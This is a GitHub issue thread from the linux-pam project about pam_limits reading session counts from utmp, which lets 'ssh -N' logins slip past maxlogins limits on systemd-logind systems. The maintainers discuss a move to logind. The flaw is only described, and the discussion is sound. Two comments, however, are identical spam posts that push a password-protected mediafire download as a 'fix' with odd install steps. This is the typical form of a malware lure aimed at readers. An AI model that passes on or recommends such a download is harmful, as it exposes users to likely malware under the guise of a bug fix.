### ISSUE TITLE
pam_limits: possibly incomplete fix for #537

### ISSUE THREAD

**Issue by StephDC** [linux-pam/linux-pam#822]
Ref: #537 

Apparently the issue shown above is not completely fixed by #541 , as pam_limits still gets the number of sessions a user have from utmp.

https://github.com/linux-pam/linux-pam/blob/4d1d4f699551f395be065e60513eaf85f01b84e6/modules/pam_limits/pam_limits.c#L39

However on a system that uses `systemd-logind`, this creates a nasty discrepancy between the number of sessions seen from pam_limits and pam_systemd. One can use `ssh -N` to login to the system, allowing pam_systemd to create a new session invisible to pam_limits, thus bypassing the maxlogins limit set to such user. In extreme cases, this could result in more sessions than systemd-logind handles (SessionsMax=8192) being requested and those excess sessions remained in sshd.service, or if pam_systemd was set to requisite, everyone including root from that point would be denied login.

**Comment by thkukuk** [comment]
If you compile pam_limits with systemd support, utmp support is not compiled in.
So if your pam_limits module still uses utmp, it is not compiled with systemd support.
So most important question: is your pam_limits module compiled with systemd support or not?
Next problem: I would never use pam_limits or anything else to limited logged in users, as there is no definition, what a logged in user is. Even pam_systemd does not count every logged in user as logged in user. So yes, you will always have a discrepancy between what different tools reports. And without standard, which describes exactly when a user as to be counted as logged in and when not, this is not fixable. And thus a standard does not exist and will, in my opinion, never come.

**Comment by StephDC** [comment]
Would you mind to point to me from within pam_limits/pam_limits.c where it omits the utmp.h?

A quick ldd check told me that while the other two files, pam_issue.so and pam_timestamp.so was linked against libsystemd.so.0, pam_limit.so is not.

I also did not find the `#ifdef USE_LOGIND` part around the `#include <utmp.h>`. Only a simple `#include <utmp.h>` whenever the system has `#ifdef __linux__`.

I am on the master branch commit https://github.com/linux-pam/linux-pam/commit/4d1d4f699551f395be065e60513eaf85f01b84e6 just in case I missed something.

**Comment by thkukuk** [comment]
Sorry, I should have looked more carefull: Yes, the PR did not add systemd support to pam_limits, and nobody did ever claim that that PR would add it.

**Comment by StephDC** [comment]
Thus, the issue #537 is not completely fixed, and pam_limits.c as mentioned in such issue remains to be fixed.

[pam_limits.so counts how often the user is currently logged in.](https://github.com/linux-pam/linux-pam/issues/537#issuecomment-1431108692) somehow went missing in the following conversation.

Response to the Next problem part, I believe that if pam_limits gets the session count from sd_login from systemd, and the systemd-logind reports the session correctly, they should match. If pam_systemd provided by systemd reported something different, that is their problem and a separate issue.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by StephDC** [comment]
Would you welcome a patch of pam_limits.so that gets the session number etc. from sd-linux.h instead of utmp.h?

or is the general use of pam_linux.so to limit maxlogins no longer a recommended way to limit how many concurrent sessions a user may have, and in case such feature is needed I should start afresh with a new pam module?

**Comment by thkukuk** [comment]
Patches are always welcome, it's on my TODO list, but will take some time until I would find time for it.

In general: even using systemd-logind will not solve your problem: systemd has meanwhile several classes, for the number of users, you should only count "class=user". This needs to be fixed in the other PAM modules, too.

So if systemd counts all classes for "SessionsMax", limiting the max number of users will not be enough.

**Comment by StephDC** [comment]
Thanks for the insight. I also asked other two parts for input and here is what I currently know.

1. openssh considered that if a user passed auth stack, a session shall be created. They do not consider session to be a good place to reject anything.
2. systemd-logind considered that if a process belongs to a user is created, a logind session shall be created.

I was kind of lost on where and how to implement a per-user session limit now. It may fit better in the auth module, but pam_limits.so only offers session as of now, and I consider rewriting it to offer auth a development instead of a simple fix.

The thing I want to protect against is one user creating too many sessions by logging in to bring down systemd-logind that has such limit as that sounds like a DoS attack factor with local access vector. I consider counting all sessions instead of "class=user" better suitable for my use case. In my case I would set the maxlogins to a pretty high level that normal usage shall never hit, thus the class part did not matter so much. But for normal usage such as enforcing a quota for each user I think that this should definitely count class=user to avoid unexpected behavior of allowing a lower number of sessions than set in maxlogins.

**Comment by thkukuk** [comment]
I'm working on replacing utmp with systemd-logind 1:1. But due to the recursive calls of the PAM stack by systemd this is much more complicated.

About your DoS attacks: the only solution to solve this is to limit the  number of parallel runnings sshds. PAM is too late.

**Comment by thkukuk** [comment]
Should be solved.
